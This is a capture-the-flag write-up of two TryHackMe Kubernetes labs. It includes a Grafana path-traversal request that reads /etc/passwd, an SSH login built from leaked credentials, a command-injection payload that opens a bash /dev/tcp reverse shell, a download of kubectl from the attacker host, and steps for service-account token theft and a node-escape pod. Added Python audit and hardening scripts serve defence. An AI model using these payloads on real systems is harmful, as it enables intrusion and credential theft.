K8s Target Machine

jerem1ah

https://tryhackme.com/hacktivities?tab=search&page=1&free=all&order=most-popular&difficulty=all&type=all&searchTxt=Kubernetes //tryhackme

https://www.cnblogs.com/yokan/p/17239100.html

https://exp10it.cn/2023/04/tryhackme-k8s-%E9%9D%B6%E6%9C%BA-writeup/#kubernetes-for-everyone //writeup

https://github.com/kubernetes/kubectl //kubectl

https://kubernetes.io/docs/tasks/tools/install-kubectl-linux/#install-kubectl-binary-with-curl-on-linux //kubectl binary

https://github.com/cdk-team/CDK //cdk

Kubernetes for Everyone

Task1: Access the Cluster

To access a cluster, you need to know the location of the K8s cluster and have credentials to access it. Compromise the cluster and best of luck. Use Nmap to find open ports and gain a foothold by exploiting a vulnerable service. If you are new to Nmap, take a look at the Nmap room.

Task2: Your Secret Crush

If you want to keep a secret, you must also hide it from yourself. Find the secret!

Scan the IP with fscan or nmap:

```
┌──(root㉿kali)-[/home/kali]
└─# nmap 10.10.239.222
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-06 08:57 EST
Nmap scan report for bogon (10.10.239.222)
Host is up (0.28s latency).
Not shown: 996 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
111/tcp  open  rpcbind
3000/tcp open  ppp
5000/tcp open  upnp

Nmap done: 1 IP address (1 host up) scanned in 3.06 seconds
```

Port 3000 is Grafana, version 8.3.0, which has an arbitrary file read vulnerability: the plugin asset endpoint does not confine the requested file to the plugin directory, so a `../` sequence walks out to any file the Grafana process can read.

The network is very slow.

```http
GET /public/plugins/gettingstarted/../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: 10.10.239.222:3000
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: redirect_to=%2F
Connection: close
```

```http
HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: no-cache
Content-Length: 1231
Content-Type: text/plain; charset=utf-8
Expires: -1
Last-Modified: Tue, 08 Feb 2022 11:40:05 GMT
Pragma: no-cache
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-Xss-Protection: 1; mode=block
Date: Wed, 06 Dec 2023 15:06:17 GMT
Connection: close

root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
man:x:13:15:man:/usr/man:/sbin/nologin
postmaster:x:14:12:postmaster:/var/mail:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
cyrus:x:85:12::/usr/cyrus:/sbin/nologin
vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
grafana:x:472:0:hereiamatctf907:/home/grafana:/sbin/nologin
```

Then on port 5000, the account name is hidden in the static file /static/css/main.css. Visiting that URL gives OZQWO4TBNZ2A====:

```css
/* @import url("https://pastebin.com/cPs69B0y"); */
OZQWO4TBNZ2A====
```

OZQWO4TBNZ2A==== is base32 and decodes to vagrant; together with hereiamatctf907, the GECOS field of the grafana entry in the /etc/passwd read above, this gives the credentials:

```
vagrant/hereiamatctf907
```

Log in via SSH with this account and run ps aux to view the process list:

```
vagrant@johnny:/$ ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.6 0.1 225276 572 ? Ss 13:35 0:43 /sbin/init
root 2 0.0 0.0 0 0 ? S 13:35 0:00 [kthreadd]
root 4 0.0 0.0 0 0 ? I< 13:35 0:00 [kworker/0:0H]
root 5 0.0 0.0 0 0 ? I 13:35 0:02 [kworker/u30:0]
root 6 0.0 0.0 0 0 ? I< 13:35 0:00 [mm_percpu_wq]
root 7 0.0 0.0 0 0 ? S 13:35 0:05 [ksoftirqd/0]
root 8 0.0 0.0 0 0 ? I 13:35 0:05 [rcu_sched]
root 9 0.0 0.0 0 0 ? I 13:35 0:00 [rcu_bh]
root 10 0.0 0.0 0 0 ? S 13:35 0:00 [migration/0]
root 11 0.0 0.0 0 0 ? S 13:35 0:00 [watchdog/0]
root 12 0.0 0.0 0 0 ? S 13:35 0:00 [cpuhp/0]
root 13 0.0 0.0 0 0 ? S 13:35 0:00 [kdevtmpfs]
root 14 0.0 0.0 0 0 ? I< 13:35 0:00 [netns]
root 15 0.0 0.0 0 0 ? S 13:35 0:00 [rcu_tasks_kthre]
root 16 0.0 0.0 0 0 ? S 13:35 0:00 [kauditd]
root 17 0.0 0.0 0 0 ? S 13:35 0:00 [xenbus]
root 18 0.0 0.0 0 0 ? S 13:35 0:00 [xenwatch]
root 19 0.0 0.0 0 0 ? I 13:35 0:00 [kworker/0:1]
root 20 0.0 0.0 0 0 ? S 13:35 0:00 [khungtaskd]
root 21 0.0 0.0 0 0 ? S 13:35 0:00 [oom_reaper]
root 22 0.0 0.0 0 0 ? I< 13:35 0:00 [writeback]
root 23 0.0 0.0 0 0 ? S 13:35 0:00 [kcompactd0]
root 24 0.0 0.0 0 0 ? SN 13:35 0:00 [ksmd]
root 25 0.0 0.0 0 0 ? I< 13:35 0:00 [crypto]
root 26 0.0 0.0 0 0 ? I< 13:35 0:00 [kintegrityd]
root 27 0.0 0.0 0 0 ? I< 13:35 0:00 [kblockd]
root 28 0.0 0.0 0 0 ? I< 13:35 0:00 [ata_sff]
root 29 0.0 0.0 0 0 ? I< 13:35 0:00 [md]
root 30 0.0 0.0 0 0 ? I< 13:35 0:00 [edac-poller]
root 31 0.0 0.0 0 0 ? I< 13:35 0:00 [devfreq_wq]
root 32 0.0 0.0 0 0 ? I< 13:35 0:00 [watchdogd]
root 35 18.3 0.0 0 0 ? R 13:35 19:20 [kswapd0]
root 36 0.0 0.0 0 0 ? I< 13:35 0:00 [kworker/u31:0]
root 37 0.0 0.0 0 0 ? S 13:35 0:00 [ecryptfs-kthrea]
root 79 0.0 0.0 0 0 ? I< 13:35 0:00 [kthrotld]
root 80 0.0 0.0 0 0 ? I< 13:35 0:00 [acpi_thermal_pm]
root 81 0.0 0.0 0 0 ? S 13:35 0:00 [scsi_eh_0]
root 82 0.0 0.0 0 0 ? I< 13:35 0:00 [scsi_tmf_0]
root 83 0.0 0.0 0 0 ? S 13:35 0:00 [scsi_eh_1]
root 84 0.0 0.0 0 0 ? I< 13:35 0:00 [scsi_tmf_1]
root 85 0.0 0.0 0 0 ? R 13:35 0:01 [kworker/u30:2]
root 90 0.0 0.0 0 0 ? I< 13:35 0:00 [ipv6_addrconf]
root 96 0.0 0.0 0 0 ? I 13:35 0:03 [kworker/u30:4]
root 100 0.0 0.0 0 0 ? I< 13:35 0:00 [kstrp]
root 114 1.2 0.0 0 0 ? I< 13:35 1:22 [kworker/0:1H]
root 118 0.0 0.0 0 0 ? I< 13:35 0:00 [charger_manager]
root 174 0.0 0.0 0 0 ? I< 13:35 0:00 [ttm_swap]
root 263 0.0 0.0 0 0 ? I< 13:35 0:00 [raid5wq]
root 289 0.0 0.0 0 0 ? I< 13:35 0:00 [kdmflush]
root 290 0.0 0.0 0 0 ? I< 13:35 0:00 [bioset]
root 298 0.0 0.0 0 0 ? I< 13:35 0:00 [kdmflush]
root 299 0.0 0.0 0 0 ? I< 13:35 0:00 [bioset]
root 346 0.0 0.0 0 0 ? S 13:35 0:02 [jbd2/dm-0-8]
root 347 0.0 0.0 0 0 ? I< 13:35 0:00 [ext4-rsv-conver]
root 404 2.0 0.1 111188 624 ? R<s 13:35 2:11 /lib/systemd/systemd-journald
root 413 0.0 0.0 0 0 ? I< 13:35 0:00 [iscsi_eh]
root 415 0.0 0.0 0 0 ? I< 13:35 0:00 [rpciod]
root 416 0.0 0.0 0 0 ? I< 13:35 0:00 [xprtiod]
root 417 0.0 0.0 105904 0 ? Ss 13:35 0:00 /sbin/lvmetad -f
root 418 0.1 0.0 45980 76 ? Ss 13:35 0:08 /lib/systemd/systemd-udevd
root 421 0.0 0.0 0 0 ? I< 13:35 0:00 [ib-comp-wq]
root 422 0.0 0.0 0 0 ? I< 13:35 0:00 [ib_mcast]
root 423 0.0 0.0 0 0 ? I< 13:35 0:00 [ib_nl_sa_wq]
root 424 0.0 0.0 0 0 ? I< 13:35 0:00 [rdma_cm]
systemd+ 455 0.0 0.0 80168 124 ? Ss 13:36 0:02 /lib/systemd/systemd-networkd
systemd+ 497 0.0 0.0 70628 84 ? Ss 13:36 0:01 /lib/systemd/systemd-resolved
root 498 0.0 0.0 47600 68 ? Ss 13:36 0:00 /sbin/rpcbind -f -w
root 623 0.0 0.0 95540 0 ? Ssl 13:36 0:00 /usr/bin/lxcfs /var/lib/lxcfs/
message+ 624 0.0 0.0 50104 328 ? Ss 13:36 0:01 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activati
syslog 635 0.2 0.0 267272 96 ? Ssl 13:36 0:15 /usr/sbin/rsyslogd -n
daemon 645 0.0 0.0 28332 32 ? Ss 13:36 0:00 /usr/sbin/atd -f
root 646 0.0 0.1 70604 688 ? Ss 13:36 0:01 /lib/systemd/systemd-logind
root 648 0.9 0.7 1232940 3568 ? Ssl 13:36 0:59 /usr/bin/amazon-ssm-agent
root 650 0.0 0.0 170440 56 ? Ssl 13:36 0:01 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
root 651 0.0 0.0 31320 376 ? Ss 13:36 0:01 /usr/sbin/cron -f
root 653 0.0 0.0 287536 72 ? Ssl 13:36 0:05 /usr/lib/accountsservice/accounts-daemon
root 679 1.7 0.7 1277280 3844 ? Ssl 13:36 1:49 /usr/bin/containerd
root 684 0.0 0.0 15956 28 ttyS0 Ss+ 13:36 0:00 /sbin/agetty -o -p -- \u --keep-baud 115200,38400,9600 ttyS0 vt220
root 686 0.0 0.0 16180 20 tty1 Ss+ 13:36 0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
root 704 0.0 0.0 72296 0 ? Ss 13:36 0:00 /usr/sbin/sshd -D
root 708 0.0 0.0 291456 340 ? Ssl 13:36 0:00 /usr/lib/policykit-1/polkitd --no-debug
root 753 0.9 0.7 1170504 3680 ? Sl 13:36 1:00 /usr/bin/ssm-agent-worker
root 776 2.4 0.2 1447128 1216 ? Ssl 13:36 2:32 /usr/bin/dockerd -H fd:// --containerd=/run/containerd/containerd.sock
root 1005 0.0 0.0 1005440 0 ? Sl 13:37 0:01 /usr/bin/docker-proxy -proto tcp -host-ip 0.0.0.0 -host-port 3000 -container-ip 172.17.0
root 1011 0.0 0.0 1005440 24 ? Sl 13:37 0:01 /usr/bin/docker-proxy -proto tcp -host-ip :: -host-port 3000 -container-ip 172.17.0.2 -c
root 1024 0.0 0.0 1005440 0 ? Sl 13:37 0:01 /usr/bin/docker-proxy -proto tcp -host-ip 0.0.0.0 -host-port 5000 -container-ip 172.17.0
root 1028 0.0 0.0 1005440 0 ? Sl 13:37 0:00 /usr/bin/docker-proxy -proto tcp -host-ip :: -host-port 5000 -container-ip 172.17.0.3 -c
root 1107 0.3 0.3 712596 1676 ? Sl 13:37 0:21 /usr/bin/containerd-shim-runc-v2 -namespace moby -id e7c06a854957fdc4f49e721a5e295c7acd2
root 1121 0.2 0.3 712852 1792 ? Sl 13:37 0:16 /usr/bin/containerd-shim-runc-v2 -namespace moby -id 54c2fca370f68b4fdb5d163e8835286c19c
vagrant 1158 0.3 0.0 28532 48 pts/0 Ss+ 13:37 0:20 python3 main.py
472 1161 6.6 1.4 786624 7316 pts/0 Ssl+ 13:37 6:49 grafana-server --homepath=/usr/share/grafana --config=/etc/grafana/grafana.ini --packagi
vagrant 1291 20.7 0.9 29744 4884 pts/0 Dl+ 13:39 21:03 /usr/local/bin/python3 /home/pyuser/main.py
kube-ap+ 1298 0.9 1.5 725628 7484 ? Sl 13:39 0:58 /var/lib/k0s/bin/kine --endpoint=sqlite:///var/lib/k0s/db/state.db?more=rwc&_journal=WAL
root 1330 0.0 0.0 0 0 ? I 13:41 0:05 [kworker/0:0]
root 1355 5.4 3.9 787240 19468 ? Ssl 13:44 5:16 /usr/local/bin/k0s controller --single=true
kube-ap+ 1363 3.7 4.0 728096 19828 ? Sl 13:45 3:36 /var/lib/k0s/bin/kine --endpoint=sqlite:///var/lib/k0s/db/state.db?more=rwc&_journal=WAL
kube-ap+ 1372 8.4 42.8 985868 210572 ? Sl 13:45 8:05 /var/lib/k0s/bin/kube-apiserver --requestheader-username-headers=X-Remote-User --anonymo
kube-sc+ 1411 4.8 2.4 753784 12132 ? Sl 13:45 4:36 /var/lib/k0s/bin/kube-scheduler --authorization-kubeconfig=/var/lib/k0s/pki/scheduler.co
kube-ap+ 1626 6.9 2.7 766848 13716 ? Rl 15:14 0:28 /var/lib/k0s/bin/kube-controller-manager --authentication-kubeconfig=/var/lib/k0s/pki/cc
vagrant 1636 0.3 0.0 76772 0 ? Ss 15:15 0:01 /lib/systemd/systemd --user
vagrant 1643 0.0 0.0 259260 8 ? S 15:15 0:00 (sd-pam)
root 1690 11.0 6.3 175760 31236 ? D 15:15 0:33 /usr/bin/python3 /usr/lib/ubuntu-release-upgrader/check-new-release -q
root 1754 0.6 0.1 105684 536 ? Ss 15:17 0:01 sshd: vagrant [priv]
vagrant 1819 0.1 0.0 107984 160 ? S 15:19 0:00 sshd: vagrant@pts/0
vagrant 1820 0.4 0.2 21472 1108 pts/0 Ss 15:19 0:00 -bash
vagrant 1835 9.0 0.6 39664 3260 pts/0 R+ 15:20 0:00 ps aux
```

The host runs k0s (a lightweight Kubernetes distribution), kine (an etcd replacement, here backed by SQLite) and Docker.

The approach is to copy the etcd database to the local machine and analyze it there; in the default configuration the data in etcd is not encrypted at rest, so Secret objects sit in the database in plaintext.

The database path is /var/lib/k0s/db/state.db.
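As an added check from my side (not part of this writeup), the following Python audits a copy of that kine SQLite database for Secret objects stored without encryption at rest. It assumes kine's schema (a table named `kine` with `name` and `value` columns and one row per revision) and relies on the `k8s:enc:` prefix that kube-apiserver writes in front of values it has encrypted; the sample database is constructed in memory.

```python
import sqlite3
import sys

# kube-apiserver prefixes values it encrypted at rest with "k8s:enc:<provider>:v1:<key>:";
# anything else stored under /registry/secrets/ is a plaintext protobuf object.
ENCRYPTED_PREFIX = b"k8s:enc:"
SECRET_KEY_PREFIX = "/registry/secrets/"


def unencrypted_secret_keys(conn: sqlite3.Connection) -> list:
    """Return etcd keys of Secrets whose newest revision sits in the database unencrypted."""
    # kine keeps one row per revision of a key (assumed schema: table kine with
    # id, name, deleted, value, ...); look only at the newest row per key and skip tombstones.
    rows = conn.execute(
        "SELECT name, value FROM kine "
        "WHERE name LIKE ? AND deleted = 0 "
        "AND id IN (SELECT MAX(id) FROM kine GROUP BY name) "
        "ORDER BY name",
        (SECRET_KEY_PREFIX + "%",),
    )
    return [
        name for name, value in rows
        if not bytes(value or b"").startswith(ENCRYPTED_PREFIX)
    ]


def build_sample_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for a copied /var/lib/k0s/db/state.db."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE kine (id INTEGER PRIMARY KEY AUTOINCREMENT, name INTEGER, "
        "created INTEGER, deleted INTEGER, create_revision INTEGER, prev_revision INTEGER, "
        "lease INTEGER, value BLOB, old_value BLOB)"
    )
    # Kubernetes protobuf objects start with the magic bytes "k8s\x00"; the rest is filler.
    plaintext = b"k8s\x00" + b"Secret db-password hunter2"
    encrypted = b"k8s:enc:aescbc:v1:key1:" + bytes(range(32))
    rows = [
        # (name, created, deleted, create_revision, prev_revision, lease, value, old_value)
        ("/registry/secrets/kube-system/api-token", 1, 0, 1, 0, 0, plaintext, None),       # old revision
        ("/registry/secrets/kube-system/api-token", 0, 0, 1, 1, 0, encrypted, plaintext),  # newest: encrypted
        ("/registry/secrets/default/db-password", 1, 0, 3, 0, 0, plaintext, None),         # still plaintext
        ("/registry/configmaps/default/app", 1, 0, 4, 0, 0, b"k8s\x00ConfigMap", None),    # not a Secret
        ("/registry/secrets/default/old-cert", 0, 1, 5, 5, 0, plaintext, plaintext),       # deleted tombstone
    ]
    conn.executemany(
        "INSERT INTO kine (name, created, deleted, create_revision, prev_revision, lease, "
        "value, old_value) VALUES (?, ?, ?, ?, ?, ?, ?, ?)",
        rows,
    )
    conn.commit()
    return conn


def audit(db_path: str) -> list:
    """Open a copied state.db read-only and list the plaintext Secrets in it."""
    conn = sqlite3.connect(f"file:{db_path}?mode=ro", uri=True)
    try:
        return unencrypted_secret_keys(conn)
    finally:
        conn.close()


if __name__ == "__main__":
    keys = audit(sys.argv[1]) if len(sys.argv) > 1 else unencrypted_secret_keys(build_sample_db())
    for key in keys:
        print("plaintext secret:", key)
```

Run it against a copy of the file (`python3 audit_state_db.py state.db`); an empty result means every Secret is encrypted at rest, which is what an EncryptionConfiguration on the API server is supposed to guarantee and what the default k0s setup here does not.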

… write later … go to sleep …

Insekube

Task1: Introduction

The learning objectives for this room are:

  • Interacting with the cluster using kubectl
  • Reading Kubernetes secrets
  • Doing recon inside the cluster
  • Switching service accounts to escalate your privileges
  • Lateral movement into other workloads
  • Gaining access to the Kubernetes nodes

We assume basic knowledge of the Kubernetes architecture and some experience running Kubernetes administration tools like kubectl.

Disclaimer: Due to this room running on a VM it uses minikube which is not exactly the same as running a fully fledged Kubernetes cluster so you might experience some minor differences with a real cluster.

This machine can take a while to boot up (Give it 5 or 6 minutes)

Scan the machine. (If you are unsure how to tackle this, I recommend checking out the Nmap room)

Task2: RCE

Visit the website, it takes a host and returns the output of a ping command.

Use command injection to get a reverse shell. For more information on command injection attacks take a look at this room

You will find the flag in an environment variable.

Task3: Interacting with kubernetes

Kubernetes exposes an HTTP API to control the cluster. All resources in the cluster can be accessed and modified through this API. The easiest way to interact with the API is to use the kubectl CLI. You could also interact with the API directly using curl or wget if you don’t have write access and kubectl is not already present; here is a good article on that.

The kubectl install instructions can be found here. However, the binary is located in the /tmp directory. In the event you run into a scenario where the binary is not available, it’s as simple as downloading the binary to your machine and serving it (with a python HTTP server for example) so it is accessible from the container.

Now let’s move to the /tmp directory where the kubectl is conveniently located for you and try the kubectl get pods command. You’ll notice a forbidden error which means the service account running this pod does not have enough permissions.

Task4: Kubernetes Secrets

Kubernetes stores secret values in resources called Secrets these then get mounted into pods either as environment variables or files.

You can use kubectl to list and get secrets. The content of the secret is stored base64 encoded.

You will find flag 2 in a Kubernetes secret.

Task5: Recon in the cluster

Some interesting Kubernetes objects to look for would be nodes, deployments, services, ingress, jobs… But the service account you control does not have access to any of them.

However, by default Kubernetes creates environment variables containing the host and port of the other services running in the cluster.

Running env you will see there is a Grafana service running in the cluster.

Task6: Lateral Movement

Kubernetes stores the token of the service account running a pod in /var/run/secrets/kubernetes.io/serviceaccount/token.

Use the LFI vulnerability to extract the token. The token is a JWT signed by the cluster.

Use the --token flag in kubectl to use the new service account. Once again use kubectl to check the permissions of this account.

Task7: Escape to the node

You can now close the Grafana pod shell and continue using the first one since it is more stable.

Having admin access to the cluster you can create any resources you want. This article explains how to get access to the Kubernetes nodes by running a pod that mounts the node’s file system.

You can create a “bad” pod based on their first case example. You will need a slight modification because the VM does not have an internet connection, therefore it is not able to pull the ubuntu container image. The image is available in minikube’s local docker registry therefore you just need to tell Kubernetes to use the local version instead of pulling it. You can achieve this by adding imagePullPolicy: IfNotPresent to your “bad” pod container. Once that is done you can run kubectl apply to create the pod. Then kubectl exec into the new pod, you will find the node’s file system mounted on /host.
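The “bad” pod described above is exactly what a cluster audit should flag: a hostPath volume pointing at the node root, plus host namespace or privileged settings. As an added example (my code, not the room's), this Python walks the JSON that `kubectl get pods -A -o json` returns and reports every pod that can reach the node this way; the sample PodList is constructed, and the `bad-pod` name is an assumption.

```python
import json

HOST_NAMESPACE_FLAGS = ("hostPID", "hostNetwork", "hostIPC")


def pod_findings(pod_list: dict) -> list:
    """Return (pod, scope, finding) triples for pods that can break out to the node."""
    findings = []
    for pod in pod_list.get("items", []):
        meta, spec = pod["metadata"], pod["spec"]
        ref = f"{meta.get('namespace', 'default')}/{meta['name']}"
        # volume name -> host path for every hostPath volume declared on the pod
        host_paths = {
            v["name"]: v["hostPath"]["path"]
            for v in spec.get("volumes", [])
            if "hostPath" in v
        }
        for flag in HOST_NAMESPACE_FLAGS:
            if spec.get(flag):
                findings.append((ref, "pod", f"{flag}=true"))
        for c in spec.get("initContainers", []) + spec.get("containers", []):
            if c.get("securityContext", {}).get("privileged"):
                findings.append((ref, c["name"], "privileged container"))
            for vm in c.get("volumeMounts", []):
                if vm["name"] in host_paths:
                    src = host_paths[vm["name"]]
                    what = "node root filesystem" if src == "/" else "hostPath"
                    findings.append((ref, c["name"], f"{what} {src} mounted at {vm['mountPath']}"))
    return findings


SAMPLE_PODS = {  # constructed PodList in the shape kubectl returns
    "kind": "PodList",
    "items": [
        {
            "metadata": {"name": "bad-pod", "namespace": "default"},
            "spec": {
                "hostPID": True,
                "volumes": [{"name": "noderoot", "hostPath": {"path": "/"}}],
                "containers": [{
                    "name": "bad-pod",
                    "image": "ubuntu",
                    "imagePullPolicy": "IfNotPresent",
                    "volumeMounts": [{"name": "noderoot", "mountPath": "/host"}],
                }],
            },
        },
        {
            "metadata": {"name": "syringe-79b66d66d7-6xdjz", "namespace": "default"},
            "spec": {
                "volumes": [{"name": "scratch", "emptyDir": {}}],
                "containers": [{
                    "name": "syringe",
                    "image": "syringe:latest",
                    "volumeMounts": [{"name": "scratch", "mountPath": "/tmp"}],
                }],
            },
        },
    ],
}


if __name__ == "__main__":
    import sys
    data = json.load(sys.stdin) if not sys.stdin.isatty() else SAMPLE_PODS
    for pod, scope, finding in pod_findings(data):
        print(f"{pod} [{scope}]: {finding}")
```

Usage: `kubectl get pods -A -o json | python3 audit_pods.py`. The same conditions are what a Pod Security Admission `restricted` profile rejects up front, so a non-empty report on a cluster that claims to enforce it is itself a finding.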

Ports 22 and 80 are open.

Visiting http://10.10.167.47:80 shows the page described above: a form that pings a supplied hostname.

The network is too slow for the browser, so use curl instead:

```
┌──(root㉿kali)-[/home/kali/Desktop]
└─# curl http://10.10.167.47/?hostname=%3Buname+-a
<!DOCTYPE html>

<head>
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css"
integrity="sha384-JcKb8q3iqJ61gNV9KGb8thSsNjpSL0n8PARn9HuZOnIxN0hoP+VmmDGMN5t9UJ0Z" crossorigin="anonymous">
<style>
body,
html {
height: 100%;
}
</style>
</head>

<body>
<div class="container h-100">
<div class="row mt-5">
<div class="col-12 mb-4">
<h3 class="text-center">Check if a website is down 💣</h3>
</div>
<form class="col-6 mx-auto" action="/">
<div class=" input-group">
<input name="hostname" value=";uname -a" type="text" class="form-control" placeholder="Hostname"
aria-label="Hostname" aria-describedby="basic-addon2" required>
<div class="input-group-append">
<button class="btn btn-outline-secondary" type="submit">Check</button>
</div>
</div>
</form>
<div class="col-9 mt-4 mx-auto">
<pre>ping: usage error: Destination address required
Linux syringe-79b66d66d7-6xdjz 5.4.0-92-generic #103-Ubuntu SMP Fri Nov 26 16:13:00 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
</pre>
</div>
</div>
</div>
</body>

</html>
```
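The ping form above is a textbook OS command injection: whatever is typed into `hostname` is glued into a shell command line, so `;uname -a` runs as a second command. As an added illustration (my code; the room's real source is not shown on this page), here is a minimal Python model of the vulnerable string-building beside a hardened handler that allow-lists the hostname and runs ping without any shell. `check_host` is an assumed name, and the vulnerable builder is only ever inspected, never executed.

```python
import re
import subprocess

# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens, no leading
# or trailing hyphen, 253 characters max. Nothing a shell cares about can pass this.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def build_command_vulnerable(hostname: str) -> str:
    """The shell string a vulnerable app builds: user text is pasted into a command line
    that is then handed to a shell, so ';', '|', '&&' and '$()' in the input are all live."""
    return f"ping -c 1 {hostname}"


def is_valid_hostname(hostname: str) -> bool:
    """Allow-list check; rejects shell metacharacters and option-looking input ('-c')."""
    return bool(HOSTNAME_RE.match(hostname))


def build_command_safe(hostname: str) -> list:
    """Hardened version: validate first, then build an argv list (no shell involved)."""
    if not is_valid_hostname(hostname):
        raise ValueError(f"rejected hostname: {hostname!r}")
    return ["ping", "-c", "1", hostname]


def check_host(hostname: str) -> str:
    """Run the hardened command; with shell=False argv elements are never reinterpreted."""
    result = subprocess.run(
        build_command_safe(hostname), capture_output=True, text=True, timeout=10
    )
    return result.stdout + result.stderr


if __name__ == "__main__":
    print("vulnerable builds:", build_command_vulnerable(";uname -a"))
    try:
        build_command_safe(";uname -a")
    except ValueError as exc:
        print("hardened rejects:", exc)
    print(check_host("localhost"))
```

Validation plus an argv list beats quoting (`shlex.quote`) because there is no shell left to parse anything; the regex also refuses a leading hyphen, so the input cannot be turned into a `ping` option either.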

Then get a reverse shell:

```
curl http://10.10.167.47/?hostname=%3Bbash%20%2Di%20%3E%26%20%2Fdev%2Ftcp%2F10%2E9%2E155%2E83%2F7779%200%3E%261
```

```
challenge@syringe-79b66d66d7-6xdjz:/tmp$ env
env
KUBERNETES_SERVICE_PORT_HTTPS=443
GRAFANA_SERVICE_HOST=10.105.120.1
KUBERNETES_SERVICE_PORT=443
HOSTNAME=syringe-79b66d66d7-6xdjz
SYRINGE_PORT=tcp://10.103.9.166:3000
GRAFANA_PORT=tcp://10.105.120.1:3000
SYRINGE_SERVICE_HOST=10.103.9.166
SYRINGE_PORT_3000_TCP=tcp://10.103.9.166:3000
GRAFANA_PORT_3000_TCP=tcp://10.105.120.1:3000
PWD=/tmp
SYRINGE_PORT_3000_TCP_PROTO=tcp
HOME=/home/challenge
KUBERNETES_PORT_443_TCP=tcp://10.96.0.1:443
LS_COLORS=
GOLANG_VERSION=1.15.7
FLAG=flag{5e7cc6165f6c2058b11710a26691bb6b}
SHLVL=2
SYRINGE_PORT_3000_TCP_PORT=3000
GRAFANA_PORT_3000_TCP_PORT=3000
KUBERNETES_PORT_443_TCP_PROTO=tcp
KUBERNETES_PORT_443_TCP_ADDR=10.96.0.1
GRAFANA_SERVICE_PORT=3000
SYRINGE_PORT_3000_TCP_ADDR=10.103.9.166
SYRINGE_SERVICE_PORT=3000
KUBERNETES_SERVICE_HOST=10.96.0.1
KUBERNETES_PORT=tcp://10.96.0.1:443
KUBERNETES_PORT_443_TCP_PORT=443
GRAFANA_PORT_3000_TCP_PROTO=tcp
PATH=/usr/local/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
OLDPWD=/home/challenge
GRAFANA_PORT_3000_TCP_ADDR=10.105.120.1
_=/usr/bin/env
```

The env output gives the first flag (the answer to Task 2). Next, fetch kubectl from a web server on the attacker machine:

```
curl -o /tmp/kubectl http://10.9.155.83:8080/kubectl
```

```
challenge@syringe-79b66d66d7-6xdjz:/tmp$ curl -o /tmp/kubectl http://10.9.155.83:8080/kubectl
<url -o /tmp/kubectl http://10.9.155.83:8080/kubectl
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:-- 0 47.5M 0 89320 0 0 99k 0 0:08:08 --:--:-- 0:08 1 47.5M 1 879k 0 0 474k 0 0:01:42 0:00:01 0:01 3 47.5M 3 1548k 0 0 553k 0 0:01:28 0:00:02 0:01 4 47.5M 4 1976k 0 0 519k 0 0:01:33 0:00:03 0:01 5 47.5M 5 2520k 0 0 520k 0 0:01:33 0:00:04 0:01 6 47.5M 6 3074k 0 0 528k 0 0:01:32 0:00:05 0:01 7 47.5M 7 3628k 0 0 533k 0 0:01:31 0:00:06 0:01 8 47.5M 8 4102k 0 0 524k 0 0:01:32 0:00:07 0:01 9 47.5M 9 4696k 0 0 530k 0 0:01:31 0:00:08 0:01 11 47.5M 11 5388k 0 0 543k 0 0:01:29 0:00:09 0:01 11 47.5M 11 5830k 0 0 537k 0 0:01:30 0:00:10 0:01 13 47.5M 13 6468k 0 0 546k 0 0:01:29 0:00:11 0:01 14 47.5M 14 7160k 0 0 558k 0 0:01:27 0:00:12 0:01100 47.5M 100 47.5M 0 0 567k 0 0:01:25 0:01:25 --:--:-- 883k
challenge@syringe-79b66d66d7-6xdjz:/tmp$ ls
ls
kubectl
